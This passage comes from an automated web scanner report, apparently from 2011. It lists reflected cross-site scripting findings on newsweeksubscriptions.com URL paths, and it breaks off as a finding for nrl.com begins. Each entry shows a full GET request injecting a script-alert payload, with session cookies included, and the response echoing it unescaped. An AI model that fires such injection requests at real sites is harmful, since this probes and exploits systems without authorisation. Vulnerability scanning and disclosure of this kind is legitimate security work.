GET /FTcontrol/www.newsweek.com64bc7<script>alert(1)</script>bda86d52164/privacy/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:43 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 798
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com64bc7<script>alert(1)</script>bda86d52164/privacy is not found !</p>
...[SNIP]...

1.279. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c1e62<script>alert(1)</script>33075a7ee65 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com/privacyc1e62<script>alert(1)</script>33075a7ee65/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:50 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 798
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/privacyc1e62<script>alert(1)</script>33075a7ee65 is not found !</p>
...[SNIP]...

1.280. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a1bb<script>alert(1)</script>336623aae3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol2a1bb<script>alert(1)</script>336623aae3d/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:00 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 589
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol2a1bb<script>alert(1)</script>336623aae3d/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3 is not found !</p>
...[SNIP]...

1.281. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload beba3<script>alert(1)</script>beaec5cc4db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.combeba3<script>alert(1)</script>beaec5cc4db/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:04 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 841
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.combeba3<script>alert(1)</script>beaec5cc4db/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3 is not found !</p>
...[SNIP]...

1.282. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76f0a<script>alert(1)</script>58a288607c4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com/privacy76f0a<script>alert(1)</script>58a288607c4/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:10 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 841
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/privacy76f0a<script>alert(1)</script>58a288607c4/Netsparker2ecbcb7311f24c6097fb3ff259d050e3 is not found !</p>
...[SNIP]...

1.283. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b8ed0<script>alert(1)</script>2842225aff2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3b8ed0<script>alert(1)</script>2842225aff2/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:14 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 841
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/privacy/Netsparker2ecbcb7311f24c6097fb3ff259d050e3b8ed0<script>alert(1)</script>2842225aff2 is not found !</p>
...[SNIP]...

1.284. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21e78<script>alert(1)</script>ccd402ebd30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol21e78<script>alert(1)</script>ccd402ebd30/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:12 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 589
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol21e78<script>alert(1)</script>ccd402ebd30/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba is not found !</p>
...[SNIP]...

1.285. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f4d8a<script>alert(1)</script>e9fc3debe90 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.comf4d8a<script>alert(1)</script>e9fc3debe90/privacy/Netsparker5a36663732014845b080367f100b25ba/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:17 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 841
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.comf4d8a<script>alert(1)</script>e9fc3debe90/privacy/Netsparker5a36663732014845b080367f100b25ba is not found !</p>
...[SNIP]...

1.286. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2c77f<script>alert(1)</script>d2cb529e928 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com/privacy2c77f<script>alert(1)</script>d2cb529e928/Netsparker5a36663732014845b080367f100b25ba/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:24 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 841
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/privacy2c77f<script>alert(1)</script>d2cb529e928/Netsparker5a36663732014845b080367f100b25ba is not found !</p>
...[SNIP]...

1.287. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25ba/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5bb2<script>alert(1)</script>35cb5faffb1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25bac5bb2<script>alert(1)</script>35cb5faffb1/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:32 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 841
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/privacy/Netsparker5a36663732014845b080367f100b25bac5bb2<script>alert(1)</script>35cb5faffb1 is not found !</p>
...[SNIP]...

1.288. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c580d<script>alert(1)</script>90a57db788 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrolc580d<script>alert(1)</script>90a57db788/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:08 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 588
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolc580d<script>alert(1)</script>90a57db788/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403 is not found !</p>
...[SNIP]...

1.289. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6329<script>alert(1)</script>859a99eb995 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.comf6329<script>alert(1)</script>859a99eb995/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:14 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 841
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.comf6329<script>alert(1)</script>859a99eb995/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403 is not found !</p>
...[SNIP]...

1.290. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 82273<script>alert(1)</script>9ab58d42917 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com/privacy82273<script>alert(1)</script>9ab58d42917/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:28 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 841
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/privacy82273<script>alert(1)</script>9ab58d42917/Netsparkeraf37e4eaaa3045748ad17258f5a76403 is not found !</p>
...[SNIP]...

1.291. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsweeksubscriptions.com
Path:	/FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a76403/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 13e16<script>alert(1)</script>cd69f4bc8c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a7640313e16<script>alert(1)</script>cd69f4bc8c1/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:32 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 841
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/www.newsweek.com/privacy/Netsparkeraf37e4eaaa3045748ad17258f5a7640313e16<script>alert(1)</script>cd69f4bc8c1 is not found !</p>
...[SNIP]...

1.292. http://www.nrl.com/News/BillHarrigan/tabid/11005/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
